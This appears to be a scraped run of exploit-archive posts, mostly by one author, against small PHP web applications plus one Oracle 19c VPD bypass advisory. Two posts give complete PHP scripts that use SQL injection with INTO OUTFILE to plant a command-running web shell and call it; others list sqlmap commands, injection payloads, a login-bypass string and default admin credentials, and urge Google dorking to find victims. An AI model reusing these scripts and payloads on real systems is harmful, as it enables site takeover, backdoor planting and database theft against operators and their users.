<pre><code>=============================================================================================================================================<br />| # Title : Beauty Parlour Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/bpms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\bpms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/admin/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Apartment Visitor Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/avms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\avms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Passion Responsive Blogging 1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://code-projects.org/responsive-blog-site-in-php-with-source-code/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /bmacblog/single.php?id=1 <==== inject here <br /><br />[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=1' AND 9732=9732-- jEuI<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 9 columns<br /> Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -<br />---<br />[23:52:32] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[23:52:32] [INFO] fetching database names<br />available databases [2]:<br />[*] bmac_blog_admin_db<br />[*] information_schema<br /><br />[+] Login : /blogadmin<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Title: Breaking Oracle Database VPD (Virtual Private Database) Through DDL Permissions in 19c<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 19c<br />Tested Version(s): 19c<br />Risk Level: Low<br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />By design VPD security feature protects against any database account that is not granted EXEMPT ACCESS POLICY from viewing the complete database rows within the table in addition of course to DBA role which I am going to tackle at the end.<br /><br />However, this security feature will not protect against accounts with DDL permissions especially an account granted the following permissions: create any procedure, execute any procedure, select any table<br /><br />For VPD simulation you can follow steps in this link: https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />sqlplus / as sysdba<br /><br />SQL> alter session set container=PDB1<br /><br />SQL> CREATE USER owoods IDENTIFIED BY owoods<br /><br />DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;<br /><br />SQL> GRANT connect, resource, create any procedure, execute any procedure, select any table<br /><br />to owoods;<br /><br />SQL> GRANT READ ON sh1.customers TO owoods;<br /><br />SQL> exit;<br /><br />sqlplus owoods/owoods@PDB1<br /><br />SQL> grant read on sh1.orders_tab to public;<br /><br />SQL>CREATE OR REPLACE PROCEDURE MDSYS.fetch_data AS<br /><br />vsql VARCHAR2(4000);<br /><br />BEGIN<br /><br />vsql := 'create table MDSYS.orders_tab_copy2 as select * from sh1.orders_tab ';<br /><br />EXECUTE IMMEDIATE vsql;<br /><br />END;<br /><br />/<br /><br />SQL> exec MDSYS.fetch_data;<br /><br />SQL> select * from MDSYS.orders_tab_copy2;<br /><br /> CUST_NO ORDER_NO<br /><br />———- ———-<br /><br /> 1234 9876<br /><br /> 5678 5432<br /><br /><br /><br /><br />All rows were successfully extracted from the table (the ones by default owoods account have no access to).<br /><br />Another important thing to consider is “DBA” role behaviour….EXEMPT ACCESS POLICY system privilege is not part of DBA role so be careful because DBA role implicitly has GRANT ANY PRIVILEGE system privilege which enables the DBA account to gran it any way.<br /><br /><br /><br />*****************************************<br />References:<br />https://docs.oracle.com/en/database/oracle/oracle-database/19/dbseg/using-oracle-vpd-to-control-data-access.html#GUID-7FFB40CB-E421-4FE4-8344-29D91360EFAD<br />https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/<br />https://databasesecurityninja.wordpress.com/2024/09/07/breaking-oracle-database-vpd-virtual-private-database-through-ddl-permissions-in-19c/<br />https://databasesecurityninja.wordpress.com/2024/09/04/oracle-database-exempt-access-policy-not-logged-for-sys-account-in-unified-audit-log-ora_secureconfig/<br /><br /><br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : ppdb v2.4-update 6118-1 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload :ppdb/root/del.php?del=-1<br /><br />[+] https://www/127.0.0.1/ppdb/root/del.php?del=-1 <=== inject here<br /><br /><br />[+] <br /> Parameter: del (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: del=-1' AND (SELECT 2786 FROM (SELECT(SLEEP(5)))KDQW) AND 'ycIc'='ycIc<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 18 columns<br /> Payload: del=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717671,0x6d616b4e6e5a77776d47757568445253596a6468726f72584c72484851664b46664c455675544252,0x71717a7871)-- -<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : POMS v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Pharmacy Management System version 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/demoocom/admin/?page=user/manage_user&id=8<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PDF Generator Web Application v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Park Ticketing Project 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/12/Park-Ticketing-Management-System-Project.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user&pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/ptms/dashboard.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Travel Agency System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin<br /><br />[+] https://www/127.0.0.1/165.232.176.12/index.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>